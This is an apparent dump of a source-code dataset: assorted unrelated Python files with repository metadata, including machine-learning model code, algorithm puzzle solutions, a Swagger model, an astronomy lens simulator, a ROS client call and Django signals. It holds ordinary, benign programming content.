encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor):
return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id)
def prepare_inputs_for_generation(
self, input_ids, past=None, attention_mask=None, use_cache=None, encoder_outputs=None, **kwargs
):
decoder_inputs = self.decoder.prepare_inputs_for_generation(input_ids, past=past)
decoder_attention_mask = decoder_inputs["attention_mask"] if "attention_mask" in decoder_inputs else None
input_dict = {
"attention_mask": attention_mask,
"decoder_attention_mask": decoder_attention_mask,
"decoder_input_ids": decoder_inputs["input_ids"],
"encoder_outputs": encoder_outputs,
"past_key_values": decoder_inputs["past_key_values"],
"use_cache": use_cache,
}
return input_dict
def resize_token_embeddings(self, *args, **kwargs):
raise NotImplementedError(
"Resizing the embedding layers via the SpeechEncoderDecoderModel directly is not supported. "
"Please use the respective methods of the wrapped decoder object (model.decoder.resize_token_embeddings(...))"
)
def _reorder_cache(self, past, beam_idx):
# apply decoder cache reordering here
return self.decoder._reorder_cache(past, beam_idx)
| [
"[email protected]"
] | |
a8be8bddddc67ab30f266259012c32c14fe1bede | ce18cf6bdb1a85a65a509597b4c0ec046b855186 | /2021年4月/接雨水.py | e3b2d4f6b80d4cf594dc6bc3a4110f902cfdb9c8 | [] | no_license | elssm/leetcode | e12e39faff1da5afb234be08e7d9db85fbee58f8 | a38103d2d93b34bc8bcf09f87c7ea698f99c4e36 | refs/heads/master | 2021-06-11T06:44:44.993905 | 2021-04-28T06:14:23 | 2021-04-28T06:14:23 | 171,072,054 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,415 | py | class Solution(object):
def trap(self, height):
"""
:type height: List[int]
:rtype: int
"""
if len(height) <= 1:
return 0
        # The brute-force double loop below has too high a time complexity, though the idea is sound.
# ans=0
# start=0
# end=0
# max_h = max(height)
# for i in range(1,max_h+1):
# for j in range(len(height)):
# if height[j]>=i:
# start=j
# break
# for k in range(len(height)):
# if height[len(height)-k-1]>=i:
# end=len(height)-k-1
# break
# for j in range(start+1,end):
# if height[j]<i:
# ans+=1
# return ans
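        # O(n) approach instead: split the array at the global maximum; on each
        # side, every bar is bounded on the peak side by that maximum, so only the
        # running maximum seen so far matters.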
        # Find the maximum height
max_h = max(height)
        # Find the index of the (first) maximum
index = height.index(max_h)
ans=0
temp=0
        # Scan from the left up to the maximum
for i in range(index):
if height[i]<height[temp]:
ans=ans+(height[temp]-height[i])
else:
temp=i
height=list(reversed(height[index:]))
temp2=0
for i in range(len(height)):
if height[i]<height[temp2]:
ans=ans+(height[temp2]-height[i])
else:
temp2=i
        return ans
| [
"[email protected]"
] | |
9bdfbf61dce36e4cf4db5e261bcab6169238f587 | 1289d4eb7e3b313ee21fa48cdd49d5af1772db0a | /main.py | d0e770d8fa33950549fa4ee9c2c436f232614fb0 | [] | no_license | ansko/Lato | a2ea6105d596ccd8874b7822b325b5921d18a70f | f5e3f8eca7af7e8f5eec649aaf8f848a6c367ef2 | refs/heads/master | 2021-01-11T02:12:45.651699 | 2016-10-15T20:07:07 | 2016-10-15T20:07:07 | 70,993,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | #!/usr/bin/env python3
# coding: utf-8
from atoms_class import Atoms
atoms = Atoms('co.50000.data')
print (atoms.atoms)
| [
"[email protected]"
] | |
69debec428098617652296bd578146c4657179a1 | caf6ae544fce3b332b40a03462c0646a32c913e1 | /master/python/swagger_client/models/deposit_id.py | 9d6a813e681197d9448474fe5c7f2b9e39942158 | [
"Apache-2.0"
] | permissive | coinsecure/plugins | 827eb0ce03a6a23b4819a618ee47600161bec1c7 | ad6f08881020c268b530d5242d9deed8d2ec84de | refs/heads/master | 2020-05-30T07:17:56.255709 | 2016-11-27T22:22:23 | 2016-11-27T22:22:23 | 63,496,663 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 3,799 | py | # coding: utf-8
"""
Coinsecure Api Documentation
To generate an API key, please visit <a href='https://coinsecure.in/api' target='_new' class='homeapi'>https://coinsecure.in/api</a>.<br>Guidelines for use can be accessed at <a href='https://api.coinsecure.in/v1/guidelines'>https://api.coinsecure.in/v1/guidelines</a>.<br>Programming Language Libraries for use can be accessed at <a href='https://api.coinsecure.in/v1/code-libraries'>https://api.coinsecure.in/v1/code-libraries</a>.
OpenAPI spec version: 1.0b
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class DepositID(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
DepositID - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'deposit_id': 'str'
}
self.attribute_map = {
'deposit_id': 'depositID'
}
self._deposit_id = None
@property
def deposit_id(self):
"""
Gets the deposit_id of this DepositID.
:return: The deposit_id of this DepositID.
:rtype: str
"""
return self._deposit_id
@deposit_id.setter
def deposit_id(self, deposit_id):
"""
Sets the deposit_id of this DepositID.
:param deposit_id: The deposit_id of this DepositID.
:type: str
"""
self._deposit_id = deposit_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
f038abaec86c975b455f314fe8312b6fb4f3a83f | 37930870719caede967fdf6905c032e22d086e8b | /scripts/imaging/simulators/instruments/vro.py | 0990c9c9733733002ed6eb4a3accc03e6b77e72d | [] | no_license | Cywtim/autolens_workspace | cbede944c0f85ee95cd7362fee957ef77e701280 | da40cafee8dc26e5d8b1041888fb280598e74a5e | refs/heads/master | 2023-04-05T14:22:06.091992 | 2021-04-15T20:29:28 | 2021-04-15T20:29:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,170 | py | """
Simulator: VRO
==============
This script simulates `Imaging` of a strong lens where:
- The resolution, PSF and S/N are representative of the Vera Rubin Observatory imaging.
"""
# %matplotlib inline
# from pyprojroot import here
# workspace_path = str(here())
# %cd $workspace_path
# print(f"Working Directory has been set to `{workspace_path}`")
from os import path
import autolens as al
import autolens.plot as aplt
"""
The `dataset_type` describes the type of data being simulated (in this case, `Imaging` data) and `dataset_name`
gives it a descriptive name. They define the folder the dataset is output to on your hard-disk:
- The image will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/image.fits`.
- The noise-map will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/noise_map.fits`.
- The psf will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/psf.fits`.
"""
dataset_type = "instruments"
dataset_instrument = "vro"
"""
The path where the dataset will be output, which in this case is:
`/autolens_workspace/dataset/imaging/instruments/vro/mass_sie__source_sersic`
"""
dataset_path = path.join("dataset", "imaging", dataset_type, dataset_instrument)
"""
For simulating an image of a strong lens, we recommend using a Grid2DIterate object. This represents a grid of (y,x)
coordinates like an ordinary Grid2D, but when the light-profile`s image is evaluated below (using the Tracer) the
sub-size of the grid is iteratively increased (in steps of 2, 4, 8, 16, 24) until the input fractional accuracy of
99.99% is met.
This ensures that the divergent and bright central regions of the source galaxy are fully resolved when determining the
total flux emitted within a pixel.
"""
grid = al.Grid2DIterate.uniform(
shape_native=(100, 100), pixel_scales=0.2, fractional_accuracy=0.9999
)
"""
Simulate a simple Gaussian PSF for the image.
"""
psf = al.Kernel2D.from_gaussian(
shape_native=(21, 21), sigma=0.5, pixel_scales=grid.pixel_scales, normalize=True
)
"""
To simulate the `Imaging` dataset we first create a simulator, which defines the exposure time, background sky,
noise levels and psf of the dataset that is simulated.
"""
simulator = al.SimulatorImaging(
exposure_time=100.0, psf=psf, background_sky_level=1.0, add_poisson_noise=True
)
"""
Setup the lens galaxy's mass (SIE+Shear) and source galaxy light (elliptical Sersic) for this simulated lens.
"""
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllIsothermal(
centre=(0.0, 0.0),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
"""
Use these galaxies to setup a tracer, which will generate the image for the simulated `Imaging` dataset.
"""
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
"""
Lets look at the tracer`s image, this is the image we'll be simulating.
"""
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid)
tracer_plotter.figures_2d(image=True)
"""
We can now pass this simulator a tracer, which creates the ray-traced image plotted above and simulates it as an
imaging dataset.
"""
imaging = simulator.from_tracer_and_grid(tracer=tracer, grid=grid)
"""
Lets plot the simulated `Imaging` dataset before we output it to fits.
"""
imaging_plotter = aplt.ImagingPlotter(imaging=imaging)
imaging_plotter.subplot_imaging()
"""
Output the simulated dataset to the dataset path as .fits files.
"""
imaging.output_to_fits(
image_path=path.join(dataset_path, "image.fits"),
psf_path=path.join(dataset_path, "psf.fits"),
noise_map_path=path.join(dataset_path, "noise_map.fits"),
overwrite=True,
)
"""
Output a subplot of the simulated dataset, the image and a subplot of the `Tracer`'s quantities to the dataset path
as .png files.
"""
mat_plot_2d = aplt.MatPlot2D(
    title=aplt.Title(label="Vera Rubin Observatory Image"),
output=aplt.Output(path=dataset_path, format="png"),
)
imaging_plotter = aplt.ImagingPlotter(imaging=imaging, mat_plot_2d=mat_plot_2d)
imaging_plotter.subplot_imaging()
imaging_plotter.figures_2d(image=True)
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid, mat_plot_2d=mat_plot_2d)
tracer_plotter.subplot_tracer()
"""
Pickle the `Tracer` in the dataset folder, ensuring the true `Tracer` is safely stored and available if we need to
check how the dataset was simulated in the future.
This will also be accessible via the `Aggregator` if a model-fit is performed using the dataset.
"""
tracer.save(file_path=dataset_path, filename="true_tracer")
"""
The dataset can be viewed in the folder `autolens_workspace/imaging/instruments/vro`.
"""
| [
"[email protected]"
] | |
f5316c97b47c37037e7f7584f2ad11d62837711b | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Games/Minecraft/pip/tests/test_help.py | b5a5f8aaba7742dfff1f6d49f2ba7a46eab76da7 | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:8a2ef4075a758034598401082ccea67056274e743bd8d3b71c91deb8be2b8201
size 1835
| [
"[email protected]"
] | |
a92d28836676c2ebdd4e48ad6ba6b45f2ddd5ddd | fd0eecb6d4f12eb326030c2f64892c6845668c4f | /docs/files/ros-service-call-logger.py | 69929603c94693f175fcbc0234197cc7350d0cb4 | [
"MIT"
] | permissive | gramaziokohler/roslibpy | 599eff049caa72ca0f23dbc8e4058e051e66556b | 55e8f396f9e7b5d5669f6a31c2ed8d9bc33c3400 | refs/heads/main | 2023-08-31T22:57:32.502924 | 2023-03-29T14:52:31 | 2023-03-29T14:52:31 | 119,359,521 | 245 | 58 | MIT | 2023-08-29T14:22:35 | 2018-01-29T09:13:24 | Python | UTF-8 | Python | false | false | 333 | py | import roslibpy
client = roslibpy.Ros(host='localhost', port=9090)
client.run()
service = roslibpy.Service(client, '/rosout/get_loggers', 'roscpp/GetLoggers')
request = roslibpy.ServiceRequest()
print('Calling service...')
result = service.call(request)
print('Service response: {}'.format(result['loggers']))
client.terminate()
| [
"[email protected]"
] | |
70b061e799152084ad6f729509a14852526468f9 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /PHY_604_Computational_Methods_in_Physics_and_Astrophysics_II_Zingale/code1/monte_carlo/uniform_random/random_test.py | f5d708344cd250ad2e460372c9cb612844584e80 | [] | no_license | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 919 | py | # Do a simple random number generator based on the linear congruential
# generator
import matplotlib.pyplot as plt
class Rand(object):
def __init__(self, seed):
self.seed = seed
self.a = 16807 # 7**5
self.c = 0
self.M = 2147483647 # 2**31 -1
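        # a = 7**5, c = 0, M = 2**31 - 1 are the Park-Miller "minimal standard" LCG parameters.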
def ran(self):
xn = (self.a*self.seed + self.c) % self.M
self.seed = xn
# note that by dividing by M and not M-1, we will never get 1,
# so this gives #s in the range [0, 1)
return xn/float(self.M)
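# Illustration (comment added; the parameters above are the classic Park-Miller / MINSTD choice):
# with seed=1 the first draw is 16807/2147483647 ~= 7.83e-06, and the sequence only repeats
# after the full period of 2**31 - 2 draws.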
def test_random():
r = Rand(1)
x = []
for i in range(10000):
x.append(r.ran())
# make pairs out of successive points
x1 = x[1:]
x = x[:-1]
plt.scatter(x, x1, s=5)
plt.xlabel(r"$x_i$")
plt.ylabel(r"$x_{i+1}$")
plt.xlim(0,1)
plt.ylim(0,1)
plt.savefig("random.png", dpi=150)
if __name__ == "__main__":
test_random()
| [
"[email protected]"
] | |
ad8452aa80df9bf192b29494939440d87bd2230d | 9a2b9a3873984e9f99cdc92be7d98af279fae36b | /app/users/locusts.py | c3021a34c5118e8f3272dba542cf12d9d34e453e | [] | no_license | jeonyh0924/celery-test | 4bf3832ef5e4175c7615051ccaefa131b65a01af | aad15232141d1f2ad69c5438030e9fcd707b6efa | refs/heads/master | 2022-11-26T05:21:48.885913 | 2020-08-06T11:05:49 | 2020-08-06T11:05:49 | 284,411,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | import random
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(5, 9)
@task
def index_page(self):
self.client.get("/health")
def on_start(self):
pass
| [
"[email protected]"
] | |
76c69c71e2615a87f13d8098ced49b2265c3c1e8 | 3490103f9c3773a717b37c3e6bedc88b9cd83cd2 | /setup.py | dd45809284ae6bf607d2dff2a2b681e1afbcbacd | [] | no_license | vuchau/django-project-template | 66cd4bf08c4b61be53d8aaed5e34d48b54901682 | 2510e82d50a705429cda96d7912d5056313c29b9 | refs/heads/master | 2021-01-18T08:05:53.465031 | 2015-01-24T22:12:12 | 2015-01-24T22:12:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | from setuptools import setup
from distutils.core import Command
class TestCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from django.conf import settings
settings.configure(
DATABASES={
'default': {
'NAME': ':memory:',
'ENGINE': 'django.db.backends.sqlite3'
}
},
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'toolbox',
)
)
from django.core.management import call_command
call_command('test', 'toolbox')
setup(
name='django-project-template',
cmdclass={'test': TestCommand}
)
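# Assumed usage (illustrative comment): running `python setup.py test` dispatches to
# TestCommand.run(), which configures an in-memory SQLite database and then runs the
# 'toolbox' app's test suite via Django's `test` management command.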
| [
"[email protected]"
] | |
a1e6e1348803e6d405076ffca4ed431681dfba1a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02781/s238378799.py | 717eeb5e77e1996b57354ee94c94ba90683c2808 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | #!/usr/bin/env python3
#%% for atcoder unittest use
import sys
input= lambda: sys.stdin.readline().rstrip()
sys.setrecursionlimit(10**9)
def pin(type=int):return map(type,input().split())
def tupin(t=int):return tuple(pin(t))
def lispin(t=int):return list(pin(t))
#%%code
def resolve():
N=input()
K,=pin()
    # digit DP
    # dp_table[index][smaller][cond] = count of numbers satisfying cond := "exactly K non-zero digits so far"
rb=(0,1)
dp_table=[[[0 for cnd in range(K+1)]for sml in rb]for ind in range(len(N)+1)]
dp_table[0][0][0]=1
#print(dp_table)
#print("degit,sml,k,prove,l,x<n,dp_table[degit-1][sml][k]")#
for degit in range(len(N)+1):
n=int(N[degit-1])
for sml in rb:
t=10 if sml else int(N[degit-1])+1
for k in range(K+1):
for prove in range(t):
x=prove
                    try:  # IndexError: skip transitions where the non-zero-digit count would exceed K
#print(degit,sml,k,prove,"l",x<n,dp_table[degit-1][sml][k])
#if sml==False and x==n:print(n,":")
dp_table[degit][sml or x<n][k+(x!=0)]+=dp_table[degit-1][sml][k]
except :pass
print(dp_table[-1][0][K]+dp_table[-1][1][K])
#print(dp_table)
#%%submit!
resolve()
| [
"[email protected]"
] | |
e117f4ebaad212623fc1ca4c75b0ce427a5091d7 | 501d029b5db8132feb1877f5e0898af7a301c910 | /ex3_1.py | 360851c26a0bb82dc626470c97dff2bdb4d8a0da | [] | no_license | Everfighting/Learn-Python-the-Hard-Way | 092b050d53bfca0f5bbc91e41ba1aacce2880cc1 | 51723bfc22472284b3902161627331882f0dbc6f | refs/heads/master | 2020-04-05T22:55:02.550343 | 2017-08-22T06:13:36 | 2017-08-22T06:13:36 | 61,793,170 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | # coding=utf-8
import math
# Compute the power with math.pow from the math module.
print math.pow(5,2)
# Compute the power with the built-in exponentiation operator.
print 5**2
# Floor division: when two integers are divided, the result is an integer and the fractional part is dropped.
# In Python 3.0 and later, / keeps the fractional part and // is the floor-division operator.
print 5/3 | [
"[email protected]"
] | |
eff753209513dfc927dc91a5466b6ddf7519166d | 98364abec1f798ed6352a1c0eda080371aacb28d | /Medium/729/729.py | fa51d5f4b2ef64dd9ed676a463da821bf4475276 | [] | no_license | GuoYunZheSE/Leetcode | 3d1b11d142734922acecf7ba5efbaf0f2ab26d81 | 45cabf05251711c6421c8c2ddbcc3fec9222f70a | refs/heads/master | 2022-05-01T05:03:20.694729 | 2022-04-27T04:10:33 | 2022-04-27T04:10:33 | 161,486,806 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,414 | py | import bisect
class MyCalendar:
# def __init__(self):
# self.left=None
# self.right=None
# self.available=[]
# def book(self, start: int, end: int) -> bool:
# if (start and end) or (start==0 and end) :
# if start<=end:
# # First Book
# if self.left==None:
# self.left=start
# self.right=end
# return True
# else:
# if end<=self.left :
# if end!=self.left:
# self.available.append((end,self.left))
# self.left=start
# return True
# if start>=self.right:
# if start!=self.right:
# self.available.append((self.right,start))
# self.right=end
# return True
# else:
# if len(self.available)>0:
# for inter in self.available:
# if inter[0]<=start and end<=inter[1]:
# self.available.remove(inter)
# if inter[0]!=start:
# self.available.append((inter[0],start))
# if inter[1]!=end:
# self.available.append((end,inter[1]))
# return True
# return False
# return False
# else:
# return False
# else:
# return False
def __init__(self):
self.arr = []
self.dict = {}
def book(self, start: int, end: int) -> bool:
if start in self.dict:
return False
if not self.arr:
self.arr.append(start)
self.dict[start] = end
return True
i = bisect.bisect_left(self.arr, start)
if i - 1 >= 0 and self.dict[self.arr[i - 1]] > start:
return False
if i < len(self.arr) and self.arr[i] < end:
return False
self.arr.insert(i, start)
self.dict[start] = end
return True
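    # Illustrative comment (added; mirrors the classic LeetCode example): with a fresh calendar,
    # book(10, 20) -> True, book(15, 25) -> False (overlaps [10, 20)), book(20, 30) -> True.
    # Bookings are kept as a sorted list of starts in self.arr plus self.dict mapping start -> end.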
if __name__ == '__main__':
S=MyCalendar()
S.book(48,50)
print(S.book(0,6)) | [
"[email protected]"
] | |
f5b80ad74e9f4b8489d21edb746c9938cea79745 | 43f3b7e4a5b7a1210ffa72c5a855d7542d68290d | /Results/Python/Array/134.py | 69581275b8fe467b583b69841182a4af0fcb49ac | [] | no_license | bar2104y/Abramyan_1000_tasks | 38e86e119245db4bac0483583cc16d8793d5689c | e0bf9f5e73d90b8eca3fe5ba7913ed12f18d989a | refs/heads/master | 2021-06-05T18:05:09.788453 | 2020-06-30T19:52:31 | 2020-06-30T19:52:31 | 150,898,700 | 5 | 2 | null | 2018-10-02T17:16:28 | 2018-09-29T20:01:33 | Python | UTF-8 | Python | false | false | 569 | py | import math
from genarr import genRandomArr
x,y = [], []
n = int(input("N: "))
# for i in range(n):
# x.append(int(input("X: ")))
# y.append(int(input("Y: ")))
x,y = genRandomArr(n,-10,10), genRandomArr(n,-10,10)
def distanse(x1,y1,x2,y2):
return(math.sqrt((x2-x1)**2 + (y2-y1)**2))
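# Illustrative comment (added): distanse(0, 0, 3, 4) == 5.0, the 3-4-5 right triangle.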
maxd = 0
for i in range(len(x)):
print((x[i],y[i]))
for j in range(i+1,len(x)):
d = distanse(x[i],y[i],x[j],y[j])
if d > maxd:
ii,jj = i,j
maxd = d
print((x[ii],y[ii]), (x[jj],y[jj]), distanse(x[ii],y[ii], x[jj],y[jj]))
| [
"[email protected]"
] | |
92addd01fb60c32929e5a515f5a438f96f32715b | 560c5d8226d74969c3fb467efd1d26178562e15c | /blog_api/users/signals.py | dcc3fa9d8133adbb65fc08daa0e17af6aee7ccfc | [
"MIT"
] | permissive | beasyx0/blog_api | 17f47fb1537d4b7e53822bbff507740363d909cc | 8d984ee3f9b2b7ea35a847013743f236a1a67fdb | refs/heads/main | 2023-06-30T02:08:40.190270 | 2021-08-04T02:09:53 | 2021-08-04T02:09:53 | 358,662,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | from django.contrib.auth.signals import user_logged_in # user_logged_out, user_login_failed
from django.db.models import signals
from django.dispatch import Signal
from django.db import transaction
from django.dispatch import receiver
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.contrib.auth import get_user_model
User = get_user_model()
from blog_api.users.models import User, VerificationCode, PasswordResetCode
@receiver(signals.post_save, sender=User)
def send_user_verification_email_signal(sender, instance, created, **kwargs):
'''Send user a verification email on first save.'''
if created:
code = VerificationCode.objects.create(user_to_verify=instance)
transaction.on_commit(
lambda: code.send_user_verification_email()
)
new_registration = Signal(providing_args=["ip_address", "user_username"])
@receiver(new_registration)
def record_ip_on_new_registration(sender, task_id, **kwargs):
username = kwargs['user_username']
ip_address = kwargs['ip_address']
user = get_object_or_404(User, username=username)
user.ip_address = ip_address
user.save()
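# Illustrative, hedged example of firing the custom signal (argument values are assumptions):
# new_registration.send(sender=None, task_id=None, ip_address='203.0.113.7', user_username='alice')
# Note that the receiver above also requires `task_id`, even though it is not declared in providing_args.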
| [
"[email protected]"
] | |
b797535219742d7c8b142f1d14633ac6f9165b4d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_138/1275.py | c8fd42dd2af78c90831cb28164d298f384b5d870 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | import os, sys
import itertools
lines = [line.strip() for line in open("%s" % sys.argv[1]).readlines()]
lines.reverse()
cases = lines.pop()
for case in range(int(cases)):
lines.pop()
lowers, highers = [], []
N = sorted(map(float,lines.pop().split(' ')))
K = sorted(map(float,lines.pop().split(' ')))
for i, n in enumerate(N):
try:
lower = max(filter(lambda x: x<n and x not in lowers, K))
lowers.append(lower)
except:
lower = None
try:
higher = max(filter(lambda x: x>n and x not in highers, K))
highers.append(higher)
except:
higher = None
print "Case #%s:" % (case+1),
print len(lowers),
print len(filter(lambda x: x[0] >x[1], [(n,K.pop(K.index(min(filter(lambda x: x>n, K) or K)))) for n in N])) | [
"[email protected]"
] | |
fc717f0194925a31c30c22421f8fd0d344685fb7 | 14a6662a1b0a6d113dfb724382e3a7e2735bbbac | /Aula04/src/app.py | a75434ebdf760bdece64d6668611e4858a65f6f3 | [] | no_license | Karagul/streamlit_bootcamp | c118c01d9bec354eaabb504c9fd1d59dc5c63c93 | 48fa703ce7a2d4ac003fe881220cb66d926f17ca | refs/heads/main | 2023-02-08T20:57:31.280465 | 2021-01-05T14:36:35 | 2021-01-05T14:36:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def carrega_dados(caminho):
dados = pd.read_csv(caminho)
return dados
def grafico_comparativo(dados_2019, dados_2020, causa, estado="BRASIL"):
if estado == "BRASIL":
total_2019 = dados_2019.groupby("tipo_doenca").sum()
total_2020 = dados_2020.groupby("tipo_doenca").sum()
lista = [int(total_2019.loc[causa]), int(total_2020.loc[causa])]
else:
total_2019 = dados_2019.groupby(["uf", "tipo_doenca"]).sum()
total_2020 = dados_2020.groupby(["uf", "tipo_doenca"]).sum()
lista = [int(total_2019.loc[estado, causa]),
int(total_2020.loc[estado, causa])]
dados = pd.DataFrame({"Total": lista,
"Ano": [2019, 2020]})
#plt.figure(figsize=(8, 6))
return sns.barplot(x="Ano", y="Total", data=dados)
#plt.title(f"Óbitos por {causa} - {estado}")
# plt.show()
def main():
obitos_2019 = carrega_dados("dados/obitos-2019.csv")
obitos_2020 = carrega_dados("dados/obitos-2020.csv")
figura = grafico_comparativo(obitos_2019, obitos_2020,
"SRAG")
st.title("Análise de Óbitos 2019-2020")
st.markdown("Este trabalho analisa dados dos **óbitos 2019-2020**")
st.pyplot(figura)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
5e7bfbedc16acf4ca6372e3a2381661d385fbfa6 | 092894284a5c5f29ff7d9323b854eb6781c64fab | /Res/Prefabs/GameObjects/player/ball.py | d9a59ff63f5dc80128a7526049375b631cd7da2a | [] | no_license | sourenaKhanzadeh/breakoutgame | 4660809ceae23b7b1bf587cc1bd6f94141f3c16f | 87ee5933c6dde22f74ee22e5f40d016a4a4b22e9 | refs/heads/master | 2020-05-22T07:17:27.345601 | 2019-05-29T21:25:21 | 2019-05-29T21:25:21 | 186,262,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | from Prefabs.GameObjects.shapes.shapes import *
from Prefabs.GameObjects.bricks.bricks import Brick
from setting import *
class Ball(Circle):
def __init__(self, x=WIDTH // 2, y=WIDTH // 2, color=CC.RED, width=0, rad=10):
super().__init__(x, y, color, width, rad)
def move(self):
# go east if less than WIDTH
if self.getX() + self.getRad() + self.dx > WIDTH:
self.dx = -self.dx
# go west if less than WIDTH
elif self.getX() - (self.getRad() - self.dx) < 0:
self.dx = -self.dx
# if hit the up screen bounce down
if self.getY() + self.getRad() < 0:
self.dy = -self.dy
# debug the ball
self.debug(DEBUG)
# move x axis
self.incX(self.dx)
# move y axis
self.decY(self.dy)
def debug(self, active):
if active:
if self.getY() > HEIGHT:
self.setY(0)
def collision(self, col:Shape):
# very simple ball collision logic
if self.getY() - self.dy == col.getY() and \
col.getX() <= self.getX() <= col.getX() + col.getW():
self.dy = -self.dy
# if the collided is a brick then change the hit number of the brick
if len(col) == OO.BRICKS:
col.hits -= 1
def __len__(self):
return OO.BALL
| [
"soure@DESKTOP-6PVNFEF.(none)"
] | soure@DESKTOP-6PVNFEF.(none) |
7c573466c7626d57389f1b8b68c257affd3f7dbc | f0bd86b187fef18409d4c55e5760b17ee549ce13 | /model/seq2seq_transformer.py | 92934239576698eb48edc982811a459c38532e5a | [
"MIT"
] | permissive | wyu-du/MultiTurnDialogZoo | da095953f4cbc3c907bbf2600734d426f4651da8 | ac6a5d4fee31aef9db86ffef599d70f099d93897 | refs/heads/master | 2022-11-17T07:13:38.403151 | 2020-07-19T21:00:20 | 2020-07-19T21:00:20 | 273,569,164 | 0 | 0 | MIT | 2020-06-19T19:14:24 | 2020-06-19T19:14:24 | null | UTF-8 | Python | false | false | 27,364 | py | #!/usr/bin/python3
# Author: GMFTBY
# Time: 2020.2.7
'''
Seq2Seq in Transformer, implemented by Pytorch's nn.Transformer
'''
import torch
import torch.nn as nn
